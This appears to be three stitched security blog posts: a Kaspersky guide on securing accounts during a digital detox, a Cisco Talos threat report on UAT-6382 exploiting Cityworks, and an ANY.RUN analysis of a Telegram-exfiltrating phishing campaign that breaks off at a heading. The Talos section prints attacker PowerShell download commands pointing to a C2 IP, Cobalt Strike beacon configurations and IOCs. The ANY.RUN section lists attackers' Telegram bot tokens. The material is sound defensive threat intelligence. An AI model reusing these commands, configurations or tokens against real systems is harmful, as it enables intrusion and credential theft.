These days, we’re hardly ever separated from our devices. According to a 2024 study conducted in the U.S. by analytics firm Reviews.org, the average user spends around 2.5 months of a year on their smartphone! That’s a staggering figure — showing just how deeply mobile devices have become ingrained into our daily lives.

A digital detox — a trendy term for taking a break from our screens and notifications — can benefit anyone with a smartphone and/or laptop. According to a review of 10 studies conducted between 2013 and 2023, digital detoxes help improve sleep quality, life satisfaction, and overall wellbeing. They also reduce anxiety, stress, depression, and phone addiction. What’s more, regular digital breaks can restore the brain’s ability to focus for long periods and process information deeply.

However, completely unplugging from the internet can pose certain cybersecurity risks to your digital life. So today, we’ll look at how to give your mind a rest while ensuring the security of your accounts, devices, data, and even smart home.

What could go wrong during a digital detox?

Of course, it’s impossible to completely eliminate all risks, but you can make some preparations to minimize their impact. But what kinds of risks are we talking about?

• Account theft — both of regular, single-service accounts, and ecosystem accounts (like Google, Apple, Facebook, Instagram, Samsung, etc.) via password guessing or SIM swapping.
• Unauthorized subscriptions and charges.
• Leak of personal data from password dumps or due to a lack of two-factor authentication.
• Account hijacking in messengers and social networks.
• Use of your devices or accounts to send spam.
• Loss or theft of your gadgets.
• Household issues — break-ins while you’re away, flooding, gas leaks, or fires.

How to stay in control during a digital detox?

Start with a digital spring-clean, and strengthen your digital perimeter across a few key areas.

Accounts, data, and finances

• Review your subscriptions. More than half of users worldwide pay for subscriptions they don’t use. According to one study, only 38% of respondents had used all of their subscriptions in the past six months. The majority had unused ones: 15% hadn’t used two, 11% three, and 3% more than five. Moreover, we tend to underestimate our total subscription costs by two to three times — even though we spend, on average, around a thousand dollars a year on them! So reviewing your subscriptions is a great place to start your digital detox, and dedicated subscription managers can help make this easier.
  Make a list of subscriptions to pause or cancel completely while you’re away. And conversely, make sure the services that require ongoing payments are linked to an account with enough funds to cover them during your detox. This might include services like website hosting autopayments, VPS rental for a project, or a paid cloud storage or mail server. Also check how long your data is retained after suspending a subscription — and when it might be permanently deleted.
• Beef up your passwords. Review your critically important accounts: online banking, government service portals, crypto wallets, and so on. If you’re already using a password manager, take advantage of the built-in password leak check If you store passwords in your browser, or your password manager can’t check for compromised passwords, switch to Kaspersky Password Manager. Replace weak passwords with unique and strong ones — our password manager can generate and remember them for you.
• Enable two-factor authentication (2FA) wherever possible so that logging in requires a one-time code. Keep in mind that codes sent via SMS aren’t secure — so for critical accounts (banks, email, social networks, ecosystem accounts like Google and Apple), switch to an authenticator app wherever you can. By the way, our password manager can help here too.
• Make backups. Create up-to-date backups of important files stored both locally and online — because the internet remembers not quite everything. Keep multiple copies — for example, on NAS at home as well as in a reliable cloud with encryption features. Don’t forget to make fresh backups of your smartphone and any other devices you’re taking with you, and store them in a safe place.
• Give backup access to people you trust. If you’re a blogger, run Telegram channels or video-hosting platforms, or have popular social media accounts, be sure to set them up so you’re not the only one with access. In case attackers do manage to compromise your account — for example, through SIM swapping or hijacking session cookies — a prompt response is essential, even if you’re away. Kaspersky Password Manager can help here too: install it on multiple devices and sync your passwords and two-factor authentication tokens across them.
• Notify your bank of your travel plans so they don’t block your card due to a “suspicious transaction” abroad. Depending on your bank, this can be done via in-app chat, a hotline, or in person.

Gadgets and connectivity

• Install security updates. Update the operating systems, apps, and firmware on all your gadgets to the latest versions. Patches fix known vulnerabilities and lower the chances of a successful attack on you. If you’re using Android, check out our pain-free guide to installing Android updates.
• Protect your devices. Make sure your both your computer and smartphone are protected with reliable security software. Enable disk encryption, and set a strong password for unlocking your device — whether you’re taking it with you or leaving it behind. On smartphones, disable biometric access, use strong passcodes, and enable automatic data-wipe after several failed unlock attempts.
  To be able to locate lost Apple devices, turn on Find My. Kaspersky for Android has a similar feature for Android devices.
• Protect your SIM cards from being swapped. Your cellphone number provides access to many services. It can be used to access social media, banking, government services, and — most critically — ecosystem accounts that store important personal data like your calendar, cloud documents, and payment card data saved in your browser. Criminals may try to get a duplicate of your SIM card at a mobile store to bypass SMS or call verification. Of course, this can happen at any time, but if you’re away, you won’t be able to respond as quickly.
  Some mobile carriers let you set a password without which all SIM reissue requests are denied. Some providers let you prohibit them from providing you with services remotely and preventing anyone from replacing your SIM card, even if they have а power of attorney – real or fake. Check what options your provider offers, and for more tips on SIM swapping protection, see our article on the topic.
• Set a good old PIN code on your primary SIM card before your trip — especially if you plan to remove it from your phone to leave at home, or swap it for a travel SIM while abroad. That way, even if your SIM falls into the wrong hands, they won’t be able to access your accounts: once inserted into a phone, the SIM won’t work without the PIN code. If you have an eSIM, keep the multi-use eSIM activation QR code stored in a secure place — or opt for single-use codes instead.
• Make sure you have a backup communication channel. If you’re heading somewhere where mobile signal is unreliable or nonexistent — like in mountainous regions — satellite SMS services (like Garmin’s inReach) or Apple’s Emergency SOS via satellite feature can be useful. Be sure to check the subscription details in advance and confirm the service is available in the country you’re visiting.

Personal safety

• Check your digital legacy settings and designate who gets access to your accounts if something happens to you. In Apple’s ecosystem, you can assign an account recovery contact in case you completely lose access to your Apple ID. With a code they receive according to your instructions, the trusted person can help you regain access to your account and data — such as a smartphone backup. However, they won’t get direct access to your data. In addition to a recovery contact, Apple also lets you designate a Legacy Contact. Google offers a similar feature called Inactive Account Manager, which is especially worth setting up if you plan not to use Google services for a long time. This option sends your selected contacts a backup of chosen data after a set period of inactivity — the default is three months. If that’s not enough for your full-on digital detox, be sure to increase the inactivity period in the settings so you don’t alarm your trusted contacts.

• Decide which smart-home and IoT devices should remain active while you’re away. Surveillance cameras and alarms should ideally not just stay on, but be connected to an uninterruptible power supply. That way, the alarm can still send a signal to the monitoring center even if burglars cut the power before breaking in. On the other hand, smart sockets, speakers, or appliances you don’t plan to use should be unplugged and disconnected from the internet. Learn more about smart-home protection here.
• Change the default passwords on all IoT devices to your own, strong ones, and don’t forget your router. Many devices come with standard login/password combos out of the box, making them vulnerable to botnet attacks. Also, if an attacker gains access to your IP camera, they can monitor your home and plan a break-in while you’re away.
• Make sure you (or a trusted person) can receive critical alerts — for example, from smoke, gas, or flood detectors — and that a relative, trusted neighbor, or friend can quickly deal with any issues. Leave your trusted contact with spare keys and a way to reach you. If you’re going fully offline for your digital detox, this could be your hotel’s phone number or the contact details of your travel companion.

How to minimize gadget use on vacation

A full digital detox might feel too extreme for many people. But if you want to truly relax without worrying about your online life or offline property, we recommend at least sticking to the following rules:

• Forget about the news, social media, and email — or at least stop checking them all the time. Special modes on Apple and Android devices can help limit your access to the most distracting apps. If these built-in tools aren’t enough, you could “become your own child” — install Kaspersky Safe Kids (included in your Kaspersky Premium subscription) and customize it by setting filters for apps, websites, and social media — adding daily time limits for each.
• Minimize your digital footprint. Avoid posting vacation photos or updates in public in real time — better is to share the memories once you’re back. That way, you’re not telling the world: “Hey, I’m not home and won’t be for two more weeks!” If you really can’t resist, at least limit the audience to close friends only.
• Let colleagues and family know in advance that you’ll be away, so they won’t worry or — most importantly — send you anything sensitive or urgent via email or messaging apps. Also, review your messaging account settings to prevent hijacking while you’re gone. Scammers love to strike when account owners are absent — so a quick reminder to your contacts not to fall for messages like “Hey! Can you lend me $100 till tomorrow?” can save you a lot of trouble.
• Set up an out-of-office message for your email and voicemail stating that you’re temporarily offline — without giving too many details about your destination or reasons for your trip.
• Take just one, essential device. If you’re traveling, don’t bring every gadget you own. Choose just one — whether a laptop, tablet, or smartphone — and keep it in your carry-on luggage. At your accommodation, store your device in a safe and never leave it unattended — even if you don’t plan to use it. If someone gets physical access to your device, they could compromise your data — and in the case of a smartphone, even steal your SIM card.
• Use a backup phone for SMS messages. If you’re swapping your main SIM for a local or tourist one, insert your home SIM into an old backup phone — ideally a basic button phone with a long battery life — and turn off mobile data. This way, you’ll still receive calls and texts to your main number and can react promptly if something suspicious happens — like getting a two-factor authentication code you didn’t request, or a bank alert about a strange transaction or loan approval. To avoid roaming charges, simply do not answer the calls from this device and contact the caller on another channel. Keep this phone in a hotel safe or other secure spot and check it at least once a day.
• Avoid risky connections. If possible, avoid connecting to unknown Wi-Fi networks or using someone else’s computer — especially if your goal is to unplug from the internet and screens. If you do need to get online (say, to check an important email), use your own device and stick to trusted Wi-Fi networks — or, better yet, mobile internet. Tourist SIM cards with cheap data plans are available pretty much everywhere in today’s world. With public Wi-Fi, use a secure connection to encrypt your traffic. And never enter passwords when using internet café networks or shared computers.

How to avoid missing anything important when you return

After your digital vacation, it’s important to return online wisely — checking what happened while you were away.

• Power on your devices and check for updates. Turn on all the gadgets you’d switched off. Security updates may have been released while you were away; install them as soon as possible before actively using your devices again. Make sure your antivirus databases are also up to date. If you had any IoT devices unplugged, turn them back on and ensure they’re working properly and reconnected to your home network (and double-check that no passwords have been reset).
• Review notifications and logs. Go through the backlog of notifications in your email, banking apps, and social media accounts. Pay close attention to login attempt alerts, two-factor authentication codes, and bank messages about transactions. If you notice any attempts to access your accounts that occurred during your digital detox, your first step should be to change the passwords for those services, terminate suspicious sessions if possible, and contact support. An SMS or push notification with a login code you didn’t request is a strong sign of a potential hack or SIM-swap attempt; in that case, immediately reach out to your mobile provider and the service in question.
• Check your SIM card and phone. After a long time offline, make sure your phone number is still active and functioning, and that your balance hasn’t been drained by any suspicious activity. A pre-set PIN code and a restriction on reissuing SIM cards should reliably protect your number. However, it’s still worth double-checking your mobile account and, at the slightest suspicion, requesting a detailed expenses log from your mobile provider.
• Assess your resilience and make notes and amendments for the future. Reflect on how well your digital ecosystem held up during your time away. The ideal outcome: nothing went wrong, your data is intact, your accounts are secure, and your home is fine. If that’s the case, congratulations — not only did you enjoy your break, but you also confirmed that your security measures work even without constant supervision. If any issues did arise — say, a backup failed or an IP camera went offline — treat them not as disasters but as lessons to learn, and take measures to improve your setup going forward.

We hope these tips help you enjoy a smooth and secure digital-detox vacation. Make the most of your time offline — and remember, it’s better to be safe than sorry. And to be even safer, follow our Telegram channel.

Kaspersky official blog – ​Read More

• Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system.  
• The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise (IOCs) related to the intrusion exploiting the CVE.  
• IOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap with those listed in Trimble’s advisory.  
• Talos clusters this set of intrusions, exploiting CVE-2025-0944, under the “UAT-6382” umbrella of activity. Based on tooling and tactics, techniques and procedures (TTPs) employed by the threat actor, Talos assesses with high confidence that the exploitation and subsequent post-compromise activity is carried out by Chinese-speaking threat actors.  
• Post-compromise activity involves the rapid deployment of web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. UAT-6382 also employed the use of Rust-based loaders to deploy Cobalt Strike and VSHell malware to maintain long-term persistent access.  
• We track the Rust-based loaders as “TetraLoader,” built using a recently publicly available malware building framework called “MaLoader.” MaLoader, written in Simplified Chinese, allows its operators to wrap shellcode and other payloads into a Rust-based binary, resulting in the creation of TetraLoader.

---

Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utilities management. 

The web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in the Chinese language. Furthermore, the custom tooling, TetraLoader, was built using a malware-builder called “MaLoader” that is also written in Simplified Chinese. Based on the nature of this tooling, TTPs, hands-on-keyboard activity and victimology, Talos assesses with high confidence that UAT-6382 is a Chinese-speaking threat actor.

Initial reconnaissance 

Successful exploitation of the vulnerable Cityworks application leads to the attackers conducting preliminary reconnaissance to identify and fingerprint the server: 

cmd.exe /c ipconfig 
cmd.exe /c pwd 
cmd.exe /c dir 
cmd.exe /c dir .. 
cmd.exe /c dir c: 
cmd.exe /c dir c:inetpub 
cmd.exe /c tasklist 

 Specific folders were enumerated before attempting to place web shells in them: 

cmd.exe /c dir c:inetpubwwwroot 
cmd.exe /c c:inetpubwwwrootCityworksServerWebSite 
cmd.exe /c dir c:inetpubwwwrootCityworksServerWebSiteAssets 

UAT-6382 heavily utilizes web shells 

Initial reconnaissance almost immediately led to the deployment of web shells to establish backdoor entry into the compromised network. These web shells consisted of multiple variations of AntSword, chinatso and Behinder along with additional generic file uploaders containing messages written in the Chinese language.

File enumeration and staging for exfiltration 

UAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then staged them in directories where they had deployed web shells for easy exfiltration: 

cmd.exe /c dir c:inetpubwwwrootCityworksServer 
cmd.exe /c copy c:inetpubwwwrootCityworksServer<backup_archives> c:inetpubwwwrootCityworksServerUploads

Deployment of backdoors 

UAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell: 

cmd[.]exe /c powershell -Command Invoke-WebRequest -Uri 'hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[.]exe' -OutFile '<parent_directory>LVLWPH[.]exe' 
 
cmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/MCUCAT[.]exe' -OutFile 'C:windowstempz1.exe' 
 
powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/TJPLYT[.]exe' -OutFile 'C:windowstempz33.exe' 
 
cmd.exe /c powershell -Command Invoke-WebRequest -Uri 'http://192[.]210[.]239[.]172:3219/z44[.]exe' -OutFile 'C:windowstempz44.exe' 

The implants Talos recovered are Rust-based loaders containing an encoded or encrypted payload. The payload is decoded/decrypted and injected into a benign process by the loader component. We track the loaders as “TetraLoader.”

TetraLoader analysis 

TetraLoader is a simple Rust-based loader. It will decode an embedded payload and inject it into a benign process such as notepad[.]exe to activate the payload. Talos has so far found two types of payloads deployed by TetraLoader on the infected endpoints: 

1. Cobalt Strike beacons: These are position-independent, in-memory Cobalt Strike beacon shellcodes that are injected into a specified benign process by TetraLoader. 
2. VShell stager: Position independent shellcode, we’ve identified as a stager for VShell, that talks to a hardcoded C2 server and executes code issued to it. 

TetraLoader is built using a relatively new payload builder framework known as “MaLoader,” which first appeared on GitHub in December 2024. MaLoader has multiple options to encode and embed shellcodes into TetraLoader, the Rust-based container. 

Figure 2. MaLoader’s builder interface

MaLoader is written in Simplified Chinese, indicating that threat actors that employed it likely knew the language to a substantial degree of proficiency.

Cobalt Strike beacons 

The Cobalt Strike beacons are relatively straightforward, with minimal changes as compared to traditionally generated Cobalt Strike beacons. One of the beacons Talos discovered reaches out to the command-and-control (C2) domain “cdn[.]lgaircon[.]xyz” and specifically consists of the following configuration settings:

BeaconType - HTTPS  
Port - 443  
SleepTime - 45000  
MaxGetSize - 2801745  
Jitter - 37  
MaxDNS - Not Found  
PublicKey - b'0x81x9f0rx06t*x86Hx86xf7rx01x01x01x05x00x03x81x8dx000x81x89x02x81x81x00x81x92xaax1dxdephxa6x80xf7xc9x7fxcfxbaxce6xd9x11(x00x1ax95

A second beacon using the same C2 domain consists of the following more detailed configuration:

BeaconType - HTTPS  
Port - 443  

SleepTime - 35000  
MaxGetSize - 2097152  
Jitter - 30  
MaxDNS - Not Found  

PublicKey_MD5 - 00c96a736d29c55e29c5e3291aedb0fd  

C2Server - lgaircon[.]xyz,/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2  
UserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15  

HttpPostUri - /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG  

Malleable_C2_Instructions - NetBIOS decode 'a'  

HttpGet_Metadata - ConstHeaders  
                  Host: lgaircon[.]xyz  
                  Accept: */ * 
                  Cookie: MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs
                  ConstParams  
                  path=/calendar  
                  Metadata  
                  netbios  
                  parameter "wa"  

HttpPost_Metadata - ConstHeaders  
                    Host: lgaircon[.]xyz  
                    Accept: */ * 
                    SessionId  
                    netbios  
                    prepend "wla42="  
                    prepend "xid=730bf7;"  
                    prepend "MSPAuth=3EkAjDKjI;"  
                    prepend "ClientId=1C0F6C5D910F9;"  
                    prepend "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;"  
                    header "Cookie"  
                    Output  
                    netbios  
                    parameter "wa"  

PipeName - Not Found  
DNS_Idle - Not Found  
DNS_Sleep - Not Found  
SSH_Host - Not Found  
SSH_Port - Not Found  
SSH_Username - Not Found  
SSH_Password_Plaintext - Not Found  
SSH_Password_Pubkey - Not Found  
SSH_Banner -  

HttpGet_Verb - GET  
HttpPost_Verb - GET  
HttpPostChunk - 96  

Spawnto_x86 - %windir%syswow64gpupdate[.]exe  
Spawnto_x64 - %windir%sysnativegpupdate[.]exe  

CryptoScheme - 0  

Proxy_Config - Not Found  
Proxy_User - Not Found  
Proxy_Password - Not Found  
Proxy_Behavior - Use IE settings  

Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg==  
Watermark - 987654321  

bStageCleanup - True  
bCFGCaution - False  

KillDate - 0  

bProcInject_StartRWX - True  
bProcInject_UseRWX - False  
bProcInject_MinAllocSize - 26808  
ProcInject_PrependAppend_x86 - b'x90x90x90x90x90x90x90x90x90'  
                                Empty  

ProcInject_PrependAppend_x64 - b'x90x90x90x90x90x90x90x90x90'  
                                Empty  

ProcInject_Execute - ntdll[.]dll:RtlUserThreadStart  
                     NtQueueApcThread-s  
                     SetThreadContext  
                     CreateRemoteThread  
                     kernel32[.]dll:LoadLibraryA  
                     RtlCreateUserThread  

ProcInject_AllocationMethod - VirtualAllocEx  

bUsesCookies - True  
HostHeader -  
headersToRemove - Not Found  

DNS_Beaconing - Not Found  
DNS_get_TypeA - Not Found  
DNS_get_TypeAAAA - Not Found  
DNS_get_TypeTXT - Not Found  
DNS_put_metadata - Not Found  
DNS_put_output - Not Found  
DNS_resolver - Not Found  
DNS_strategy - round-robin  
DNS_strategy_rotate_seconds - -1  
DNS_strategy_fail_x - -1  
DNS_strategy_fail_seconds - -1  
Retry_Max_Attempts - 0  
Retry_Increase_Attempts - 0  
Retry_Duration - 0 

Another beacon reaches out to C2 “www[.]roomako[.]com” and has the following configuration: 

BeaconType - HTTPS  
Port - 443  
SleepTime - 25000  
MaxGetSize - 2801745  
Jitter - 37  
MaxDNS - Not Found  

PublicKey - b"0x81x9f0rx06t*x86Hx86xf7rx01x01x01x05x00x03x81x8dx000x81x89x02x81x81x00xaa#x18xebx;xd3?xe7xa7xb5x95xb1xe7xb2ax99O)x8exebx/:xc10cxfex04#xe5_ x82xabx9dxbex99xd0Wxb5xfafrax14@x9ax16Fs5xa0xe6xf3xa6x13xdcx91Nxdeqlx89xc5RkDxefqxeaxa8xc5'$xdf]l#xacsx0c/;xc3Exf8x0fSx7fxbdxcdx0b]Ex97xf2xf2Qxe8x00xa7ux04x90rx95xfdxac`k9xefaxe5x9ftWxc5xc7x90xb8x8ax15xab+x02x03x01x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"  

C2Server - www[.]roomako[.]com,/jquery-3[.]3[.]1[.]min[.]js  
UserAgent - Not Found  
HttpPostUri - /jquery-3[.]3[.]2[.]min[.]js  
HttpGet_Metadata - Not Found  
HttpPost_Metadata - Not Found  

SpawnTo - b'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'

PipeName - Not Found  

DNS_Idle - Not Found  
DNS_Sleep - Not Found  
SSH_Host - Not Found  
SSH_Port - Not Found  
SSH_Username - Not Found  
SSH_Password_Plaintext - Not Found  
SSH_Password_Pubkey - Not Found  

HttpGet_Verb - GET  
HttpPost_Verb - POST  
HttpPostChunk - 0  

Spawnto_x86 - %windir%syswow64dllhost[.]exe  
Spawnto_x64 - %windir%sysnativedllhost[.]exe  

CryptoScheme - 0  

Proxy_Config - Not Found  
Proxy_User - Not Found  
Proxy_Password - Not Found  
Proxy_Behavior - Use IE settings  

Watermark - 987654321  
bStageCleanup - True  
bCFGCaution - False  
KillDate - 0  

bProcInject_StartRWX - False  
bProcInject_UseRWX - False  
bProcInject_MinAllocSize - 17500  
ProcInject_PrependAppend_x86 - b'x90x90x90'  
                              Empty  

ProcInject_PrependAppend_x64 - b'x90x90x90'  
                              Empty  

ProcInject_Execute - ntdll:RtlUserThreadStart  
                     CreateThread  
                     NtQueueApcThread-s  
                     CreateRemoteThread  
                     RtlCreateUserThread  

ProcInject_AllocationMethod - NtMapViewOfSection  

  bUsesCookies - True  

HostHeader - Host: www[.]roomako[.]com 

VShell stager 

The VShell stager is relatively simple and uses rudimentary socket APIs to connect with a hardcoded C2 server such as “192[.]210[.]239[.]172:2219”. The stager, usually injected into a benign process by TetraLoader, initially sends a preliminary beacon to the C2 and then waits for a response. The response sent by the C2 is usually a single-byte Xorred payload that is then executed in memory by the implant. This is likely UAT-6382’s modification in VShell. 

The payload received by the VShell stager is in fact the actual VShell implant. VShell is a GoLang-based implant that talks to its C2 and provides a wide variety of remote access trojan-based functionalities, such as the capabilities to perform file management, run arbitrary commands, take screenshots and run NPS-based proxies on the infected endpoint.

Like other Chinese-authored tooling observed in the intrusions, VShell C2 panels are also written in Chinese. Although limited language support for English is available in the panel, it still mostly uses the Chinese language as seen in Figure 5, indicating that operators need to be familiar with the language to use the panel proficiently. 

Coverage 

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Indicators of compromise (IOCs) 

The IOCs can also be found in our GitHub repository here.

TetraLoader 

14ed3878b6623c287283a8a80020f68e1cb6bfc37b236f33a95f3a64c4f4611f 
4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9 
1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b 
1c38e3cda8ac6d79d9da40834367697a209c6b07e6b3ab93b3a4f375b161a901 

 CobaltStrike beacons 

C02d50d0eb3974818091b8dd91a8bbb8cdefd94d4568a4aea8e1dcdd8869f738 

 Network IOCs 

cdn[.]phototagx[.]com 
www[.]roomako[.]com 
lgaircon[.]xyz
https://www[.]roomako[.]com/jquery-3[.]3[.]1[.]min[.]js  
https://lgaircon[.]xyz/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 
https://cdn[.]lgaircon[.]xyz/jquery-3[.]3[.]1[.]min[.]js 
hxxps[://]cdn[.]phototagx[.]com/ 
  
192[.]210[.]239[.]172 
hxxp[://]192[.]210[.]239[.]172:3219/LVLWPH[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/MCUCAT[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/TJPLYT[.]exe 
hxxp[://]192[.]210[.]239[.]172:3219/z44[.]exe 

xa5xdfx19x06xf3xd1;xb1x15xe9xdbxcanxc6xbaxdb{xd3xc4,xd4xcfxd1x07xe2x1fix07%xd2rx9cxa7xd1z+zxddxacxd0x18x04x8exfbqpxe1xe1xb81xb1vx12xe4x8dxf0xc0vx1cxf9xc6xcaxc8xedxc4,y~x17rxebp)xedxa6xbaxdcxf5+xeds.txdcx8blxee&x9ex84xb4axb1kx9axc1xx00qrxe6xbfqx02x03x01x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00′>

Cisco Talos Blog – ​Read More

While analyzing malware samples uploaded to ANY.RUN’s Interactive Sandbox, one particular case marked as “phishing” and “Telegram” drew the attention of our security analysts. 

Although this analysis session wasn’t attributed to any known malware family or threat actor group, the analysis revealed that Telegram bots were being used for data exfiltration. This led us to apply a message interception technique for Telegram bots, previously described on the ANY.RUN blog. 

The investigation resulted in a clear and practical case study demonstrating how intercepting Telegram bot communications can aid in profiling the threat actor behind a relatively obscure phishing campaign. 

Key outcomes of this analysis include: 

• Examination and technical analysis of a lesser known phishing campaign 

• Demonstration of Telegram API-based data interception techniques 

• Collection of threat intelligence (TI) indicators to help identify the actor 

• Recommendations for detecting this type of threat 

Let’s dive in. 

Technical Analysis of Attack with Telegram Bot 

Let’s take a closer look at the analysis session: 

View analysis session 

The subject of the analysis is a phishing page hosted on a Notion workspace. The page content is in Italian, which, combined with the subdomain name, suggests this is a targeted campaign aimed at Italian-speaking users or organizations. 

The URL submitted for analysis was: 

hxxps[:]//studiosperandio.notion[.]site/1c37ff25a354805f8dd0eed23673d4e8?pvs=4 

Here’s how the page appeared inside ANY.RUN’s Interactive Sandbox: 

It’s worth noting that the use of Notion workspaces as easily accessible infrastructure for phishing activity is not new.

This is supported by the number and frequency of related samples uploaded to ANY.RUN sandbox, as seen in the following TI Lookup query. 

The targeted user is prompted to view a document that was allegedly shared with them.

To do so, they are asked to sign in using their Microsoft credentials via the following link: 

hxxps[:]//gleaming-foregoing-quicksand[.]glitch[.]me/noter.html 

Clicking the link opens a hastily crafted phishing page designed to mimic a Microsoft OneNote login prompt. The page presents multiple authentication options, including: 

• Office365 

• Outlook 

• Rackspace 

• Aruba Mail 

• PEC 

• Altra Posta 

After selecting a login method, the user is prompted to enter their credentials: 

However, clicking the “Login” button does not grant access to the shared document. Instead, several malicious actions are triggered: 

1. The phishing page uses the ipify[.]org service to retrieve the victim’s IP address. 

2. The collected login, password, and IP address are then exfiltrated via a Telegram bot, with the bot token and chat ID hardcoded directly into the phishing script. 

3. Finally, the user is redirected to the official Microsoft OneNote login page to reinforce the illusion of legitimacy. 

As a result, this is a classic case of phishing aimed at credential harvesting. 

From the Telegram API response to the data submission request, we were able to extract details about the Telegram bot used by the attacker:  

• Name: Sultanna  
• Username: @Sultannanewbot  
• Token: 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE  
• Exfiltration chat ID: 6475928726 

The combination of the Notion → Glitch domain chain appeared suspicious. A search in ANY.RUN’s Threat Intelligence Lookup revealed several additional submissions following the same pattern: 

DomainName:”notion AND domainName:”glitch” 

In all of these cases, the Notion workspace used is different (as indicated by the subdomain), but the attack vector is entirely the same. Both the phishing design and the page’s functionality are identical to what was described earlier. 

A search based on the hash and fragments of the phishing page content led us to several earlier submissions, the oldest of which dates back to August 26, 2024. Let’s examine a few: 

Sample submission 1: September 19, 2024

View sandbox session

Upon analyzing the HTML content of the page, we can confirm it follows the exact same pattern: 

• OneNote credential phishing 

• Exfiltration of IP address and credentials via a Telegram bot 

• A domain chain consisting of two services, the first of which is a Cloud Service Provider (CSP) 

The differences this time lie in the use of a different token and chatID bots, as well as a different domain in the attack chain, involving Google Docs and Backblaze B2. 

The exact same code is used to retrieve the victim’s IP address and exfiltrate the stolen data to a Telegram bot, as described earlier. 

Information obtained about the Telegram bot used in this case: 

• Name: remaxx24 
• Username: @remaxx24bot 
• Token: 7072331661:AAEnFxNxOI162AVQUCmfDHMdy6s4fGrnTZY 
• Chat ID: 5308217415 

Sample submission 2: August 26, 2024

View sandbox session

The attack vector remains the same, with only a slight variation in the phishing theme, this time impersonating an Aruba PEC login page (in Italian: PEC, Posta Elettronica Certificata). 

It’s worth noting that over a relatively long period, only a few elements have changed: 

• The phishing pretext (e.g., impersonating a OneNote login instead of PEC) 

• Minor visual adjustments to the page layout 

Meanwhile, the malicious JavaScript used to steal credentials has remained identical except for changes to the Telegram bot token and chat ID. 

Telegram bot used in this instance: 

• Name: Resultant 
• Username: @Resultantnewbot 
• Token: 6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E 
• Chat ID: 6475928726 

Based on the analysis above, it can be concluded that this is part of a phishing campaign specifically targeting Italian users and employees of Italian organizations. 

Notable characteristics of the campaign include its low operational tempo (as indicated by the limited number and frequency of submissions) and the overall simplicity of the attacker’s tooling. The threat actor relies on free platforms to host phishing content, such as Notion, Glitch, Google Presentation, and RenderForest, uses no or only rudimentary evasion techniques, and leverages Telegram bots as readily available, off-the-shelf C2 infrastructure. 

Page Hunting 

